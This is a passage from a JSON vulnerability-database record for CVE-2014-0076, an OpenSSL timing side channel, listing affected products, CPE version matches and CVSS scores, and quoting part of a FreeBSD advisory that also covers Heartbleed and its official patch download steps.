v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.2x51-d27.2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "flex system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.9" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x44-d24", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "junos r1", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "junos 13.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45-" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "9.2-releng", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "junos 12.2x50-d50.1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.33" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "junos 12.2r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "system x3400m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73791.42" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "junos 12.1x44-d35.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hardware management console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.0" }, { "model": "9.1-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8za", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "junos 12.3x48-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "junos 13.2x51-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.2" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "8.3-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null } ], "sources": [ { "db": "BID", "id": "66363" }, { "db": "NVD", "id": "CVE-2014-0076" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:beta6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.0l", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.3a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0076" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "127607" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "128001" } ], "trust": 0.9 }, "cve": "CVE-2014-0076", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.4, "id": "CVE-2014-0076", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "LOW", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0076", "trust": 1.0, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2014-0076", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0076" }, { "db": "NVD", "id": "CVE-2014-0076" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack. OpenSSL is prone to an information-disclosure weakness. \nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-14:06.openssl Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSL multiple vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2014-04-08\nAffects: All supported versions of FreeBSD. \nCorrected: 2014-04-08 18:27:39 UTC (stable/10, 10.0-STABLE)\n 2014-04-08 18:27:46 UTC (releng/10.0, 10.0-RELEASE-p1)\n 2014-04-08 23:16:19 UTC (stable/9, 9.2-STABLE)\n 2014-04-08 23:16:05 UTC (releng/9.2, 9.2-RELEASE-p4)\n 2014-04-08 23:16:05 UTC (releng/9.1, 9.1-RELEASE-p11)\n 2014-04-08 23:16:19 UTC (stable/8, 8.4-STABLE)\n 2014-04-08 23:16:05 UTC (releng/8.4, 8.4-RELEASE-p8)\n 2014-04-08 23:16:05 UTC (releng/8.3, 8.3-RELEASE-p15)\nCVE Name: CVE-2014-0076, CVE-2014-0160\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\n0. Revision History\n\nv1.0 2014-04-08 Initial release. \nv1.1 2014-04-08 Added patch applying step in Solutions section. \n\nI. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nThe Heartbeat Extension provides a new protocol for TLS/DTLS allowing the\nusage of keep-alive functionality without performing a renegotiation and a\nbasis for path MTU (PMTU) discovery for DTLS. \n\nElliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the\nDigital Signature Algorithm (DSA) which uses Elliptic Curve Cryptography. \nOpenSSL uses the Montgomery Ladder Approach to compute scalar multiplication\nin a fixed amount of time, which does not leak any information through timing\nor power. \n\nII. Problem Description\n\nThe code used to handle the Heartbeat Extension does not do sufficient boundary\nchecks on record length, which allows reading beyond the actual payload. \n[CVE-2014-0160]. Affects FreeBSD 10.0 only. \n\nA flaw in the implementation of Montgomery Ladder Approach would create a\nside-channel that leaks sensitive timing information. [CVE-2014-0076]\n\nIII. Impact\n\nAn attacker who can send a specifically crafted packet to TLS server or client\nwith an established connection can reveal up to 64k of memory of the remote\nsystem. Such memory might contain sensitive information, including key\nmaterial, protected content, etc. which could be directly useful, or might\nbe leveraged to obtain elevated privileges. [CVE-2014-0160]\n\nA local attacker might be able to snoop a signing process and might recover\nthe signing key from it. [CVE-2014-0076]\n\nIV. Workaround\n\nNo workaround is available, but systems that do not use OpenSSL to implement\nthe Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1)\nprotocols implementation and do not use the ECDSA implementation from OpenSSL\nare not vulnerable. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 8.x and FreeBSD 9.x]\n# fetch http://security.FreeBSD.org/patches/SA-14:06/openssl.patch\n# fetch 